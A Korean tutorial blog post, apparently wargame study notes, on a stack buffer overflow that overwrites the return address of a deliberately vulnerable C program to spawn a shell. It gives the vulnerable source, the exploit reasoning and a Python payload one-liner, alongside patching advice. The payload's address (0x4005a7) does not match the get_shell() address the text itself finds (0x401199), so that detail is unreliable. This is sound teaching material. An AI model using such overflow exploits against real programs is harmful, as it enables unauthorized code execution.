Exploit Tech: Return Address Overwrite

---

서론

이제 스택 오버 플로우를 활용한 RET를 변조해 셸을 획득하는.. 그런
워게임을 해봅시다 아래는 예제예요

// Name: rao.c
// Compile: gcc -o rao rao.c -fno-stack-protector -no-pie
 
#include <stdio.h>
#include <unistd.h>
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};
  execve(cmd, args, NULL);
}
 
int main() {
  char buf[0x28];
  init();
 
  printf("Input: ");
  scanf("%s", buf);
  return 0;
}

---

취약점 분석

프로그램의 취약점은 scanf("%s", buf)에 있습니다. scanf함수의 포맷 스트링 중 하나인
%s는 문자열을 입력받을 때 사용하는 것으로, 입력 길이 제한하지 않으며, 
공백 문자인 띄어쓰기, 탭, 개행 문자 등이 들어올 때까지 계속 입력을 받는다는 특징이 취약점!

 

이런 특징으로 버퍼 크기보다 큰 데이터를 입력 시 오버플로우 발생함
따라서 scanf에%s 포맷 스트링은 사용X 정확히 n개의 문자만 입력받는 "%[n]s"의 형태로 사용하세요

 

이외에도, C/C++의 표준 함수 중 버퍼를 다루면서 길이 제한을 안하는 함수는 대부분 위험요소로써,
대표적으로 strcpy, strcat, sprinf가 있습니다. 코드 작성 시 버퍼의 크기를 같이 입력하는
strncpy, strncat, snprintf, fgets, memcpy 등이 바람직하며 뒤에 _s를 붙이는 방법도 존재!

 

이 예제에선 크기가 0x28(40byte)인 버퍼에 scanf("%s", buf)로 입력 받으므로 BOF 해봅시다

💡C/C++의 문자열 종결자(Terminator)와 표준 문자열 함수들의 취약성

 C계열 언어는 널바이트("\x00")로 종료되는 데이터 배열을 문자열로 취급하며,
문자열을 다루는 대부분의 표준 함수는 널바이트를 만날 때까지 연산을 진행합니다.

 그렇다면 표준 함수에서 제한이 되는 널바이트가 없을 경우 문자열 함수는 널바이트를 
찾을 때까지 배열을 참조하며, 코드를 작성할 때 정의한 배열의 크기를 넘어서도 계속 인덱스 ↑
이런 동작으로 인해 인덱스 값이 배열의 크기보다 커지는 현상 OOB(Index Out-Of-Bound)!

OOB는 심각한 보안 문제를 야기할 수 있습니다 자세한 부분은 뒤에서 배우죠

---

트리거🔫

취약점을 발현시키는 것(행위)

예제를 컴파일 후 실행하고 테스트를 해봅시다 

프로그램이 정상 종료되었죠 그럼 이젠 트리거를 해볼까요 

짧은 입력과 달리 Segment fault라는 에러 출력되며, 프로그램이 비정상적 종료되었죠
이는 프로그램이 잘못된 메모리 주소에 접근했다는 의미며, 프로그램에 버그 발생 신호!!
이 에러에 대한 자세한 내용은 여기에서..(위키백과예요)

 

뒤의 (core dumped)는 코어파일(core)을 생성했다는 것으로, 프로그램 비정상 종료 시
디버깅을 돕기 위해 OS가 생성한 것입니다.

코어 파일이 생성되지 않아요

 리눅스는 기본적으로 코어 파일의 크기를 제한하기에 바이너리가 세그먼트 폴트를
발생시키고도 코어파일이 생성이 안된다면 생성할 코어파일의 크기가 초과했다는 뜻!

다음 커맨드나 밑에 링크를 통해 확인해보세요 저도 좀 버그가 있더라고요

ulimit -c unlimited

코어가 덤프되었지만 코어 파일이 현재 디렉토리에 없습니까? – 12개의 답변

core dump파일 생성하기

---

코어 파일 분석🔍

gdb에는 코어 파일을 분석하는 기능이 있죠 이를 통해 하나씩 분석해봅시다.

 

다음 명령어 코어 파일을 엽니다. 프로그램 종료원인을 확인을 나타내며,
어떤 주소의 명령어를 실행하다 문제 발생했는지 알려줌

Context에서 DISAM 코드와 스택을 관찰하면, 프로그램이 main함수에서 반환하려하는데,
스택 최상단에 저장된 값이 입력값의 일부인 것을 알 수 있습니다.

 

이는 실행가능한 메모리의 주소가 아니므로 세그먼테이션 폴트 발생!!
이 값이 원하는 코드 주소가 되도록 적절한 입력을 주면, main함수에서 반환 시 expoit 가능

---

익스플로잇

1. 스택 프레임 구조 파악

스택 버퍼에 오버플로우를 발생 해 반환주소를 덮으려면, 우선 해당 버퍼가 스택 프레임
어디에 위치하는지 조사해야합니다. 이를 위해 밑에 이미지를 보실까요?

scanf 함수가 취약하므로 그 이전값만 호출한 부분쪽으로 들어갑시당
그리고 이를 의사 코드로 표현하면 다음과 같습니다

scanf("%s", (rbp-0x30));

즉, 오버플로우를 발생시킬 버퍼는 rbp-0x30에 위치합니다.
스택 프레임의 구조를 떠올려 보면, rbp에 SFP가 저장되고, rbp+0x8에는 반환 주소 저장됨

입력할 버퍼와 반환 주소 사이에 0x38만큼의 거리가 있으므로, 그만큼을 dummy data로 채우고,
실행하고자 하는 코드의 주소를 입력하면 실행 흐름을 조작할 수 있음

---

get_shell() 주소 확인

이 예제에선 셸을 실행해주는 get_shell() 함수가 있으므로,
이 함수의 주소로 main함수의 반환 주소를 덮어서 셸을 획득할 수 있음

get_shell()의 주소를 찾기 위해 gdb를 사용합니다.

get_shell()의 주소가 0x401199임을 확인했습니다.

---

페이로드 구성

이제 expoit에 사용할 payload를 구성해야 합니다.
시스템 해킹에서 페이로드는 공격을 위해 프로그램에 전달하는 데이터를 의미

---

엔디언 적용

구성한 페이로드는 적절한 엔디언(Endian)을 적용해 프로그램에 전달해야 해요
엔디언은 메모리에서 데이터가 정렬되는 방식으로 주로
리틀 엔디언(Little-Endian, LE)과 빅 엔디언(Big-Endian, BE)이 사용됩니다.

리틀 엔디언에서는 데이터의 Most Significant Byte(MSB; 가장 왼쪽의 바이트)가 가장 높은 주소로
빅 엔티언에선 데이터의 MSB가 가장 낮은 주소로 저장됩니다.

 

익스플로잇을 작성할 땐 대상 시스템의 엔디언을 고려해야하는 이유겠죠
전 리틀 엔디언인 x64아키텍처 기반을 대상으로 하므로 
get_shell()의 주소인 0x401199는 "\x99\x11\x40\x00\x00\x00\x00\x00"로 전달 되야겠죠

// Name: endian.c
// Compile: gcc -o endian endian.c
 
#include <stdio.h>
 
int main() {
  unsigned long long n = 0x4005a7;
  printf("Low <-----------------------> High\n");
 
  for (int i = 0; i < 8; i++) printf("0x%hhx ", *((unsigned char*)(&n) + i));
  return 0;
}

위 코드는 어떻게 저장되는지 확인 용도같네요
이왕이면 직접 짜시는것도 좋고 그냥 확인만 하셔도 좋을 듯 하네요

---

익스플로잇

엔디언을 적용하여 페이로드를 작성하고, 이를 다음 커맨드로 rao에 전달하면 셸 획득!

$ (python -c "import sys;sys.stdout.buffer.write(b'A'*0x30 + b'B'*0x8 + b'\xa7\x05\x40\x00\x00\x00\x00\x00')";cat)| ./rao

---

취약점 패치

취약점을 발견하는 방법만큼 중요한 것이 취약점 패치입니다 앞으로 부족하나마
위 강의 외에 보호기법도 기재해보겠습니다! 이번엔 날먹할께요 히히

 

rao

 

rao에서는 위험한 문자열 입력함수를 사용하여 취약점이 발생했습니다.
해당 취약점을 패치하기위해 C언어에서 자주 사용되는 문자열 입력 함수와 패턴들을 살펴보고,
각각의 특징을 알아보겠습니다.

Return Address Overwrite

---

참고 자료

Exploit Tech: Return Address Overwrite

Return Address Overwrite

 

코어가 덤프되었지만 코어 파일이 현재 디렉토리에 없습니까? – 12개의 답변

core dump파일 생성하기

 

Segmentation fault - Wikipedia

 

참고 이미지

Exploit Tech: Return Address Overwrite

Overflow free icons designed by smalllikeart